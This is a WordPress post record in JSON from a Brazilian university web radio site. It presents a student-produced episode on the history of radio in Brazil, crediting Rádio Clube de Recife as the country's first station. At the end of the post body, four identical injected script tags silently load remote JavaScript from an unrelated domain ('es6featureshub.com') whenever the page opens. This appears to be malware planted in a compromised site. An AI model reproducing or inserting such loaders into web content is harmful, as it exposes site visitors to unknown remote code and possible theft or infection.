{"id":13881,"date":"2023-08-24T18:11:10","date_gmt":"2023-08-24T21:11:10","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=13881"},"modified":"2025-10-21T12:56:33","modified_gmt":"2025-10-21T15:56:33","slug":"programa-tupi","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/","title":{"rendered":"Programa Tupi"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Programa Tupi&#8221;<\/p><p class=\"category\">Espa\u00e7o Experimental<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/ESPACO-EXPERIMENTAL-PROGRAMA-TUPI-2023.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no <a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/espaco-experimental\/\" target=\"_blank\" rel=\"noreferrer noopener\">Espa\u00e7o Experimental<\/a>. Os trabalhos foram realizados durante a atividade curricular dos alunos e alunas da <a href=\"https:\/\/www.instagram.com\/facomufpa\/?hl=pt-br&amp;__coig_restricted=1\" target=\"_blank\" rel=\"noreferrer noopener\">Faculdade de Comunica\u00e7\u00e3o da UFPA<\/a>, para a disciplina Introdu\u00e7\u00e3o ao Radiojornalismo, ministrada pela professora Net\u00edlia Seixas. \u00a0<\/p>\n\n\n\n<p>No Programa Tupi, a equipe de estudantes &#8211; formada por Joyce Nunes, &nbsp;Victor Geraldo, Raquel Botelho, Felipe Almeida, Yara Campos e Ana Luiza &#8211; narra a linha do tempo do r\u00e1dio no Brasil, demarcando a origem desse ve\u00edculo de comunica\u00e7\u00e3o em cada regi\u00e3o do pa\u00eds.<\/p>\n\n\n\n<p>Dessa forma, este epis\u00f3dio da s\u00e9rie destaca o pioneirismo da R\u00e1dio Clube de Recife no processo da radiodifus\u00e3o brasileira, desbancando assim a R\u00e1dio Sociedade do Rio de Janeiro que por muito tempo foi considerada a primeira do pa\u00eds. Por\u00e9m, depois de muitas pesquisas, a Clube de Recife foi oficializada, em 2018, como a precursora do r\u00e1dio no Brasil. Em entrevista concedida \u00e0 Agencia Brasil e tamb\u00e9m utilizada pela equipe do Programa Tupi, o professor e pesquisador Luiz Arthur Ferraretto explica:&nbsp;<\/p>\n\n\n\n<p>\u201cO cultivo do r\u00e1dio no sentido de r\u00e1dio cultura come\u00e7a em Recife. Isso fica claro olhando toda essa movimenta\u00e7\u00e3o cultural que existe naquela cidade em torno dessa nova tecnologia que estava surgindo. E pela proximidade &nbsp;deles em rela\u00e7\u00e3o aos Estados Unidos, eles recebem as primeiras transmiss\u00f5es de r\u00e1dio dos Estados Unidos. E ai eles come\u00e7am a ficar com vontade de fazer e v\u00e3o come\u00e7ar a fazer com os equipamentos que eles tinham, mas sempre de forma clandestina\u201d. &nbsp;<\/p>\n\n\n\n<p>E, assim, atualmente a R\u00e1dio Sociedade do Rio de Janeiro se estabelece como a primeira emissora fundada na regi\u00e3o Sudeste do Brasil, em 1923. No in\u00edcio, a programa\u00e7\u00e3o era voltada para a elite brasileira com transmiss\u00e3o de \u00f3peras, concertos e recitais de poesias. Uma realidade que foi se modificando de acordo com as mudan\u00e7as nas demandas e preferencias dos ouvintes.<\/p>\n\n\n\n<p>Com isso, a medida em que o r\u00e1dio se popularizava novas emissoras iam surgindo no Sudeste, incluindo as r\u00e1dios Record, Bandeirantes, Globo e a Tupi, no Rio de Janeiro. E mesmo com o surgimento de outras tecnologias e meios de comunica\u00e7\u00e3o, no Sudeste, o r\u00e1dio ainda lidera em audi\u00eancia, alcan\u00e7ando 88% da popula\u00e7\u00e3o com 1.442 emissoras em funcionamento, segundo pesquisas realizadas em 2021.<\/p>\n\n\n\n<p>No Programa Tupi, voc\u00ea ainda faz um passeio pela hist\u00f3ria do r\u00e1dio nas regi\u00f5es Sul, Centro-Oeste e Norte, al\u00e9m de conferir a opini\u00e3o de especialistas e ouvintes que n\u00e3o abrem m\u00e3o da informa\u00e7\u00e3o, entretenimento e companhia que o velho e bom r\u00e1dio proporciona, seja com a resist\u00eancia de quem prefere os aparelhos tradicionais, seja com a modernidade e as novas tecnologias e formatos no atual mundo da Internet. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>O Programa Tupi \u00e9 uma produ\u00e7\u00e3o dos estudantes da turma de jornalismo 2021: Joyce Nunes, &nbsp;Victor Geraldo, Raquel Botelho, Felipe Almeida, Yara Campos e Ana Luiza. Para conhecer um pouco mais sobre a Hist\u00f3ria do R\u00e1dio no Brasil e no Mundo e as suas transforma\u00e7\u00f5es ao longo do tempo, n\u00e3o perca os epis\u00f3dios da s\u00e9rie Ondas do R\u00e1dio.<\/p>\n\n\n\n<p>Reportagem: Denily Carvalho<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Programa Tupi\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\" aria-label=\"Read more about Programa Tupi\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":13883,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-13881","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Programa Tupi - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Produ\u00e7\u00e3o dos alunos da FACOM\/UFPA.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Programa Tupi - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Produ\u00e7\u00e3o dos alunos da FACOM\/UFPA.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-24T21:11:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:56:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Programa Tupi\",\"datePublished\":\"2023-08-24T21:11:10+00:00\",\"dateModified\":\"2025-10-21T15:56:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\"},\"wordCount\":580,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\",\"name\":\"Programa Tupi - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1\",\"datePublished\":\"2023-08-24T21:11:10+00:00\",\"dateModified\":\"2025-10-21T15:56:33+00:00\",\"description\":\"Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Produ\u00e7\u00e3o dos alunos da FACOM\/UFPA.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1\",\"width\":1280,\"height\":720,\"caption\":\"Programa Tupi\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Programa Tupi\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Programa Tupi - Radio Web UFPA","description":"Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Produ\u00e7\u00e3o dos alunos da FACOM\/UFPA.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/","og_locale":"pt_BR","og_type":"article","og_title":"Programa Tupi - Radio Web UFPA","og_description":"Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Produ\u00e7\u00e3o dos alunos da FACOM\/UFPA.","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-08-24T21:11:10+00:00","article_modified_time":"2025-10-21T15:56:33+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1","type":"image\/webp"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Programa Tupi","datePublished":"2023-08-24T21:11:10+00:00","dateModified":"2025-10-21T15:56:33+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/"},"wordCount":580,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/","name":"Programa Tupi - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1","datePublished":"2023-08-24T21:11:10+00:00","dateModified":"2025-10-21T15:56:33+00:00","description":"Programa Tupi \u00e9 o nome do segundo epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Produ\u00e7\u00e3o dos alunos da FACOM\/UFPA.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1","width":1280,"height":720,"caption":"Programa Tupi"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/programa-tupi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Programa Tupi"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/o-que-e-radio-online.webp?fit=1280%2C720&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3BT","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=13881"}],"version-history":[{"count":11,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13881\/revisions"}],"predecessor-version":[{"id":17778,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13881\/revisions\/17778"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/13883"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=13881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=13881"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=13881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}